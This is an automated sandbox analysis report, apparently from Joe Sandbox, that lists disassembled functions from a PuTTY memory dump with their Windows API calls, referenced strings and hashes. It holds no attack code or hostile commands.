Opcode Fuzzy Hash: f2284d1eeddde13471561ac0a65f397146a9f94abeebdf4090213b859dd3ac92
Instruction Fuzzy Hash: 6F72E032A1C68285EA649B1DAA403BA7791FF88794F544235DF8E8B7E5DF3CE445CB00

Function 00007FF6BB286080 Relevance: 60.4, APIs: 40, Instructions: 426windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6BB286132
MulDiv.KERNEL32 ref: 00007FF6BB28615E
CreateFontA.GDI32 ref: 00007FF6BB286204
SelectObject.GDI32 ref: 00007FF6BB286217
GetTextMetricsA.GDI32 ref: 00007FF6BB286228
GetOutlineTextMetricsA.GDI32 ref: 00007FF6BB28623E
GetObjectA.GDI32 ref: 00007FF6BB286284
TranslateCharsetInfo.GDI32 ref: 00007FF6BB28631F
GetOEMCP.KERNEL32 ref: 00007FF6BB286332
GetCPInfo.KERNEL32 ref: 00007FF6BB28634F
CreateFontA.GDI32 ref: 00007FF6BB2863E6
CreateCompatibleDC.GDI32 ref: 00007FF6BB2863F6
CreateCompatibleBitmap.GDI32 ref: 00007FF6BB28640F
SelectObject.GDI32 ref: 00007FF6BB286425
SelectObject.GDI32 ref: 00007FF6BB286434
SetTextAlign.GDI32 ref: 00007FF6BB28643B
SetTextColor.GDI32 ref: 00007FF6BB286449
SetBkColor.GDI32 ref: 00007FF6BB286454
SetBkMode.GDI32 ref: 00007FF6BB286462
ExtTextOutA.GDI32 ref: 00007FF6BB28649C
GetPixel.GDI32 ref: 00007FF6BB2864D5
SelectObject.GDI32 ref: 00007FF6BB2864F3
DeleteObject.GDI32 ref: 00007FF6BB2864FC
DeleteDC.GDI32 ref: 00007FF6BB286505
DeleteObject.GDI32 ref: 00007FF6BB286558
CreateFontA.GDI32 ref: 00007FF6BB2865F6
SelectObject.GDI32 ref: 00007FF6BB286637
GetTextMetricsA.GDI32 ref: 00007FF6BB28664D
SelectObject.GDI32 ref: 00007FF6BB286687
GetTextMetricsA.GDI32 ref: 00007FF6BB28669D
SelectObject.GDI32 ref: 00007FF6BB2866D7
GetTextMetricsA.GDI32 ref: 00007FF6BB2866ED
ReleaseDC.USER32 ref: 00007FF6BB28671D
DestroyIcon.USER32 ref: 00007FF6BB286730
LoadImageA.USER32 ref: 00007FF6BB286764
DeleteObject.GDI32 ref: 00007FF6BB286783
DeleteObject.GDI32 ref: 00007FF6BB2867B2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Object$Text$Select$CreateDeleteMetrics$Font$ColorCompatibleInfo$AlignBitmapCharsetDestroyIconImageLoadModeOutlinePixelReleaseTranslate
String ID:
API String ID: 3464282134-0
Opcode ID: ae0eee2e33ddb7383dd445c5378252d2129dbf155ee4a47e8564913de5b98830
Instruction ID: 763d35eddd28ea9ce26ae88957ac3952eb1d1abd5edc007be771e6386cd2ff9a
Opcode Fuzzy Hash: ae0eee2e33ddb7383dd445c5378252d2129dbf155ee4a47e8564913de5b98830
Instruction Fuzzy Hash: 2B225535A0864286EB608B19ED5437E77A0FB8DB94F644135DA4E837B4DF7DE4448F00

Function 00007FF6BB2C6A00 Relevance: 58.0, APIs: 20, Strings: 13, Instructions: 230windowlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6BB2C6A57
GetDC.USER32 ref: 00007FF6BB2C6A6A
GetCurrentObject.GDI32 ref: 00007FF6BB2C6ADB
GetObjectA.GDI32 ref: 00007FF6BB2C6AEE
CreateCompatibleDC.GDI32 ref: 00007FF6BB2C6B03
CreateCompatibleBitmap.GDI32 ref: 00007FF6BB2C6B1D
SelectObject.GDI32 ref: 00007FF6BB2C6B35
BitBlt.GDI32 ref: 00007FF6BB2C6B68
GetDIBits.GDI32 ref: 00007FF6BB2C6BFE
GetLastError.KERNEL32 ref: 00007FF6BB2C6C08

Part of subcall function 00007FF6BB2C62C0: LoadLibraryA.KERNELBASE ref: 00007FF6BB2C62E9

GetLastError.KERNEL32 ref: 00007FF6BB2C6CAC

Part of subcall function 00007FF6BB2C7AD0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2C7B7B

ReleaseDC.USER32 ref: 00007FF6BB2C6D81
DeleteObject.GDI32 ref: 00007FF6BB2C6D8A
DeleteObject.GDI32 ref: 00007FF6BB2C6D93

Strings

(, xrefs: 00007FF6BB2C6B90
DwmGetWindowAttribute, xrefs: 00007FF6BB2C6A4D
dwmapi.dll, xrefs: 00007FF6BB2C6A35
CreateCompatibleBitmap: %s, xrefs: 00007FF6BB2C6D10
BitBlt: %s, xrefs: 00007FF6BB2C6D54
'%s': unable to open file, xrefs: 00007FF6BB2C6D6A
CreateCompatibleDC(desktop window dc): %s, xrefs: 00007FF6BB2C6CDF
SelectObject: %s, xrefs: 00007FF6BB2C6D3E
BM, xrefs: 00007FF6BB2C6C42
GetDIBits (get data): %s, xrefs: 00007FF6BB2C6C15
6, xrefs: 00007FF6BB2C6C51
, xrefs: 00007FF6BB2C6B55
GetDC(window): %s, xrefs: 00007FF6BB2C6CB9

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Object$CompatibleCreateDeleteErrorLast$AddressBitmapBitsCurrentFormatLibraryLoadMessageProcReleaseSelect
String ID: $'%s': unable to open file$($6$BM$BitBlt: %s$CreateCompatibleBitmap: %s$CreateCompatibleDC(desktop window dc): %s$DwmGetWindowAttribute$GetDC(window): %s$GetDIBits (get data): %s$SelectObject: %s$dwmapi.dll
API String ID: 2770305857-4119329088
Opcode ID: b7c78afcc9d950a31a416b02529308a9915c2e6be36a185e55a5db1dc00a66ce
Instruction ID: c96758c32576972896ffc3ae84ee326a954f7febedbc4eb49810a2f92643f01a
Opcode Fuzzy Hash: b7c78afcc9d950a31a416b02529308a9915c2e6be36a185e55a5db1dc00a66ce
Instruction Fuzzy Hash: DAA1B121B0964286FE21AB2AA9447BE7391FF8CB80F544539DE4DC77B5EE3CE1448B00

Function 00007FF6BB289920 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 193windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6BB289A09
GetDeviceCaps.GDI32 ref: 00007FF6BB289A1A
CreatePalette.GDI32 ref: 00007FF6BB289A32
SelectPalette.GDI32 ref: 00007FF6BB289A5A
RealizePalette.GDI32 ref: 00007FF6BB289A5F
GetStockObject.GDI32 ref: 00007FF6BB289A6A
SelectPalette.GDI32 ref: 00007FF6BB289A79
SetPaletteEntries.GDI32 ref: 00007FF6BB289B44
GetDC.USER32 ref: 00007FF6BB289B56
SelectPalette.GDI32 ref: 00007FF6BB289B71
UnrealizeObject.GDI32 ref: 00007FF6BB289B82
RealizePalette.GDI32 ref: 00007FF6BB289B8B
ReleaseDC.USER32 ref: 00007FF6BB289C33

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

GetStockObject.GDI32 ref: 00007FF6BB289BB9
SelectPalette.GDI32 ref: 00007FF6BB289BC8
ReleaseDC.USER32 ref: 00007FF6BB289BD8

Strings

wgs.term_hwnd, xrefs: 00007FF6BB289B9B
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB289946, 00007FF6BB28996C, 00007FF6BB289BA2
ncolours <= OSC4_NCOLOURS - start, xrefs: 00007FF6BB289965
start <= OSC4_NCOLOURS, xrefs: 00007FF6BB28993F

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Palette$Select$Object$RealizeReleaseStock$CapsCreateDeviceEntriesUnrealize_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$ncolours <= OSC4_NCOLOURS - start$start <= OSC4_NCOLOURS$wgs.term_hwnd
API String ID: 997932918-2827769490
Opcode ID: fcda29c7dba3b0a0d22bbff40291ae48a52213664db1bee19f9ecd77ac25dedf
Instruction ID: 943c8720691740c2b3e0d79015fd2ad807fb378247975345623f8b5cd76e5b21
Opcode Fuzzy Hash: fcda29c7dba3b0a0d22bbff40291ae48a52213664db1bee19f9ecd77ac25dedf
Instruction Fuzzy Hash: 7F918E11A0C64285FB118B2DEC453BD2BA1BF8DB95F599235CF4E823B1EE7DA085CB00

Function 00007FF6BB2BF930 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 294networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FF6BB2BF976
socket.WS2_32 ref: 00007FF6BB2BFA30
SetHandleInformation.KERNEL32 ref: 00007FF6BB2BFA53
setsockopt.WS2_32 ref: 00007FF6BB2BFA84
setsockopt.WS2_32 ref: 00007FF6BB2BFAB5
setsockopt.WS2_32 ref: 00007FF6BB2BFAE6
htons.WS2_32 ref: 00007FF6BB2BFB78

Part of subcall function 00007FF6BB2AC7B0: WSAAsyncSelect.WS2_32 ref: 00007FF6BB2AC803

Strings

sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses, xrefs: 00007FF6BB2BFC6E
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00007FF6BB2BFC75

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: setsockopt$AsyncHandleInformationSelectclosesockethtonssocket
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses
API String ID: 2867244687-386099739
Opcode ID: 4e52387319c08913508be460891239f9140749c4fd0938012223976450d64b96
Instruction ID: b94f22377bf7fc197316326368240ffb0193984c7087e63e01fe0f7956bc9023
Opcode Fuzzy Hash: 4e52387319c08913508be460891239f9140749c4fd0938012223976450d64b96
Instruction Fuzzy Hash: 6AD17A76A08A9582EB609B19E18877A73A0FB8CB94F110535DB4D877B5DF3DE485CB00

Function 00007FF6BB2BFE90 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 251networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF6BB2BFF49
SetHandleInformation.KERNEL32 ref: 00007FF6BB2BFF6B
setsockopt.WS2_32 ref: 00007FF6BB2BFFCA
getaddrinfo.WS2_32 ref: 00007FF6BB2C0071
htons.WS2_32 ref: 00007FF6BB2C00AA
bind.WS2_32 ref: 00007FF6BB2C0133
listen.WS2_32 ref: 00007FF6BB2C0146
closesocket.WS2_32 ref: 00007FF6BB2C0166
WSAGetLastError.WS2_32 ref: 00007FF6BB2C0171
closesocket.WS2_32 ref: 00007FF6BB2C0180
closesocket.WS2_32 ref: 00007FF6BB2C018D
WSAGetLastError.WS2_32 ref: 00007FF6BB2C0193

Strings

false && "bad address family in sk_newlistener_internal", xrefs: 00007FF6BB2C023B
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00007FF6BB2C0242

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: closesocket$ErrorLast$HandleInformationbindgetaddrinfohtonslistensetsockoptsocket
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
API String ID: 2773167020-2428366578
Opcode ID: ba69cd6409ef2b0edaea2873cf8cd8221fdbe4780480bcb871cebcba3d72f0a6
Instruction ID: 4e6f1a597f54f1e564b3b0a4c331e177384807f88c6f84c7b9e3da15ad2d0cea
Opcode Fuzzy Hash: ba69cd6409ef2b0edaea2873cf8cd8221fdbe4780480bcb871cebcba3d72f0a6
Instruction Fuzzy Hash: 21B1E821A0C78286FB648B29E91437EA2A1FF89B54F144635DB9E837F1DF7DE4858700

Function 00007FF6BB287410 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 152windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 00007FF6BB28744D
AppendMenuA.USER32 ref: 00007FF6BB287483
DeleteMenu.USER32 ref: 00007FF6BB287588
DeleteMenu.USER32 ref: 00007FF6BB287599
InsertMenuA.USER32 ref: 00007FF6BB2875C8
InsertMenuA.USER32 ref: 00007FF6BB2875EB
DeleteMenu.USER32 ref: 00007FF6BB28760A
DeleteMenu.USER32 ref: 00007FF6BB28761B
InsertMenuA.USER32 ref: 00007FF6BB28764A
InsertMenuA.USER32 ref: 00007FF6BB28766D

Strings

nesting < 2, xrefs: 00007FF6BB2874F5
IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX, xrefs: 00007FF6BB2874AD
S&pecial Command, xrefs: 00007FF6BB2875A7, 00007FF6BB287629
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB28745D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Menu$DeleteInsert$AppendCreatePopup
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
API String ID: 1803796953-3159962390
Opcode ID: 26008b51967a907af220f5abb768738df6b3bc28772d07ff6e923f0e873e51aa
Instruction ID: 015a62cc680934594e9fac8f01ace9b26a387e5bc007772467780f7f1b7dac88
Opcode Fuzzy Hash: 26008b51967a907af220f5abb768738df6b3bc28772d07ff6e923f0e873e51aa
Instruction Fuzzy Hash: 39517125B1861641FB10DB1EED5473926A0BF8CBD4F684536CE4E87BB0DE7DE4468B40

Function 00007FF6BB30E3A0 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 283filememorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB32B240: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B307
Part of subcall function 00007FF6BB32B240: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B30F
Part of subcall function 00007FF6BB32B240: WaitNamedPipeA.KERNEL32 ref: 00007FF6BB32B322
Part of subcall function 00007FF6BB32B240: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B329

WriteFile.KERNEL32 ref: 00007FF6BB30E447
CloseHandle.KERNEL32 ref: 00007FF6BB30E48B
FindWindowA.USER32 ref: 00007FF6BB30E4D6
GetCurrentThreadId.KERNEL32 ref: 00007FF6BB30E4ED
LocalAlloc.KERNEL32 ref: 00007FF6BB30E533
ReadFile.KERNEL32 ref: 00007FF6BB30E642
CreateFileMappingA.KERNEL32 ref: 00007FF6BB30E6EC

Strings

PageantRequest%08x, xrefs: 00007FF6BB30E4F3
Pageant, xrefs: 00007FF6BB30E4CC

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: File$CreateErrorLast$AllocCloseCurrentFindHandleLocalMappingNamedPipeReadThreadWaitWindowWrite
String ID: Pageant$PageantRequest%08x
API String ID: 2212006894-270379698
Opcode ID: a9ebc251c4196ad02cb41d6553401f63469b37bedc21275b5530d8155a2560c2
Instruction ID: 8c49641343b04c107e6704f249b60d5745f14e779d0728a229127ec000d8e2ff
Opcode Fuzzy Hash: a9ebc251c4196ad02cb41d6553401f63469b37bedc21275b5530d8155a2560c2
Instruction Fuzzy Hash: DCB1BF21B08A5286FA509B2AE55477A6391FF8DBE4F544634EF5E87BE5DF3CE0018B00

Function 00007FF6BB2A4C30 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 223windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF6BB2A4C93
MapDialogRect.USER32 ref: 00007FF6BB2A4DF2
CreateWindowExA.USER32 ref: 00007FF6BB2A4E5F
SendMessageA.USER32 ref: 00007FF6BB2A4E76
MapDialogRect.USER32 ref: 00007FF6BB2A4F77
GetDlgItem.USER32 ref: 00007FF6BB2A4F82
SetWindowPos.USER32 ref: 00007FF6BB2A4FBC
MapDialogRect.USER32 ref: 00007FF6BB2A4FE3
MapDialogRect.USER32 ref: 00007FF6BB2A5016
GetWindowRect.USER32 ref: 00007FF6BB2A5026
SetWindowPos.USER32 ref: 00007FF6BB2A5065
ShowWindow.USER32 ref: 00007FF6BB2A5070

Strings

STATIC, xrefs: 00007FF6BB2A4DB2
EDIT, xrefs: 00007FF6BB2A4E53

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: RectWindow$Dialog$MessageSend$CreateItemShow
String ID: EDIT$STATIC
API String ID: 2330346805-43825268
Opcode ID: 6e7706600d2d904500700ed94df90ccb8346061f418200c8f03e5ae947f2dfbc
Instruction ID: 4a8441b8a3291eaf05186e4a9559db2580e3d94dc4d4796cc50e66d469cabde7
Opcode Fuzzy Hash: 6e7706600d2d904500700ed94df90ccb8346061f418200c8f03e5ae947f2dfbc
Instruction Fuzzy Hash: EDA158766087848AEB608B19F94076BB7A5FBC9B84F504125DF8D87B68DF7CE4458F00

Function 00007FF6BB34BB90 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 337COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB35841C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB358442

Part of subcall function 00007FF6BB358398: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB3583C1

GetModuleHandleExW.KERNEL32 ref: 00007FF6BB34BC3A
GetModuleFileNameW.KERNEL32 ref: 00007FF6BB34BC5C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C06F

Part of subcall function 00007FF6BB358484: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB3584B2

Strings

Assertion failed!, xrefs: 00007FF6BB34BBC1
..., xrefs: 00007FF6BB34BCD5, 00007FF6BB34BDC7, 00007FF6BB34BE12, 00007FF6BB34BF35, 00007FF6BB34BFFA, 00007FF6BB34C027
Program: , xrefs: 00007FF6BB34BBFB
Expression: , xrefs: 00007FF6BB34BED5
File: , xrefs: 00007FF6BB34BD18
<program name unknown>, xrefs: 00007FF6BB34BC66
Line: , xrefs: 00007FF6BB34BE63
(Press Retry to debug the application - JIT must be enabled), xrefs: 00007FF6BB34BF9D
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 00007FF6BB34BF69

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo$Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
API String ID: 3031022502-1508414584
Opcode ID: d7d843c2f65a12b0c34e94e771a953dbeb68fb05c278f58f0e75c4f794b81323
Instruction ID: c309d0ffbfd490d18cec37950f77ad09fd6fee0b70c47c0b61f48021c1d3757d
Opcode Fuzzy Hash: d7d843c2f65a12b0c34e94e771a953dbeb68fb05c278f58f0e75c4f794b81323
Instruction Fuzzy Hash: 61C1A265B0874380FA509F6AA9052FA6265BF9DBC4F848032DF0ED36F2EE7DE5058744

Function 00007FF6BB281EED Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 328windowtimeCOMMON

Download Yara Rule

APIs

ShowCursor.USER32 ref: 00007FF6BB28286E
GetCursorPos.USER32 ref: 00007FF6BB282883
GetMonitorInfoA.USER32 ref: 00007FF6BB2828C8
IsZoomed.USER32 ref: 00007FF6BB28290B
GetWindowLongPtrA.USER32 ref: 00007FF6BB282921
SendMessageA.USER32 ref: 00007FF6BB282961
GetKeyboardState.USER32 ref: 00007FF6BB28297B
GetKeyboardState.USER32 ref: 00007FF6BB28299D
GetMessageTime.USER32 ref: 00007FF6BB282A27
ReleaseCapture.USER32 ref: 00007FF6BB282C1B
SetCapture.USER32 ref: 00007FF6BB282FD9

Strings

(, xrefs: 00007FF6BB2828B2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CaptureCursorKeyboardMessageState$InfoLongMonitorReleaseSendShowTimeWindowZoomed
String ID: (
API String ID: 760066194-3887548279
Opcode ID: 570241226dc569d8556a6d44eafd03aa757bfd8765273278d836e16b3d774ded
Instruction ID: 7e1c07a64306edcb0d3f9f743489dd9c18b12c385f4dc9fe0ea522dfa6db85a2
